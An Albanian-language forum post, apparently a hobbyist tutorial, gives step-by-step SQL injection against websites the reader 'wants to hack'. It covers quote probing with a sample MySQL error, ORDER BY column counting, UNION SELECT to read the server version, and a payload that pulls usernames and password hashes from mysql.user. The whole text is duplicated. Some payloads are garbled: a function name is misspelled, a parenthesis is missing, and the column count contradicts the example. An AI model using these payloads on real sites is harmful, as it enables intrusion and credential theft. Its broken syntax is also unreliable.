Përshendetje bashkforumist të dashur vendosa të bëj një tuto rreth '' sql injection ''.
Së pari webi që doni të hakoni duhet të jete vulnerable për të shikuar a është ueb-faqja vulnerable ja shtojm stringun ' , neqoftse na del nje mezash i ngjajshëm kështu
Cito:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''499''' at line 1
SELECT * FROM acdsite.news WHERE id = '499''
ueb-faqja është vulnerable dhe mund ta hakoni.
Tani duhet me gjet sa columna ka ueb-faqja veproni kështu order by 4/* ose me nje numer tjeter , provoni prej numrit te madh deri ne te voglin.Pra tani po e marr shembull që web-faqja i ka 4 columna , pastaj veproni kështu union select 1,2,3,4,5/* ta provojm nëqoftse mundet kështu.
Tani duhet të ja gjejme verzionin e msyql , veprojm kështu union select 1,2,@@version,4,5/* nëqoftse ka web-faqja4 kolumna si mora shembul më parë.
Tani na ka mbet gjeja e fundit për të gjetur username dhe password të ueb-faqës , veproni kështu.
union select 1,2,concact_ws(0x3a,user,password,4,5 from mysql.user/*
Autori:rigonn
Kështu veprojm vetem nësë web-faqja i ka 4 kolumns , pastaj tjeter nëqoftse ka ndryshe columns ju e ndrroni.
Së pari webi që doni të hakoni duhet të jete vulnerable për të shikuar a është ueb-faqja vulnerable ja shtojm stringun ' , neqoftse na del nje mezash i ngjajshëm kështu
Cito:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''499''' at line 1
SELECT * FROM acdsite.news WHERE id = '499''
ueb-faqja është vulnerable dhe mund ta hakoni.
Tani duhet me gjet sa columna ka ueb-faqja veproni kështu order by 4/* ose me nje numer tjeter , provoni prej numrit te madh deri ne te voglin.Pra tani po e marr shembull që web-faqja i ka 4 columna , pastaj veproni kështu union select 1,2,3,4,5/* ta provojm nëqoftse mundet kështu.
Tani duhet të ja gjejme verzionin e msyql , veprojm kështu union select 1,2,@@version,4,5/* nëqoftse ka web-faqja4 kolumna si mora shembul më parë.
Tani na ka mbet gjeja e fundit për të gjetur username dhe password të ueb-faqës , veproni kështu.
union select 1,2,concact_ws(0x3a,user,password,4,5 from mysql.user/*
Autori:rigonn
Kështu veprojm vetem nësë web-faqja i ka 4 kolumns , pastaj tjeter nëqoftse ka ndryshe columns ju e ndrroni.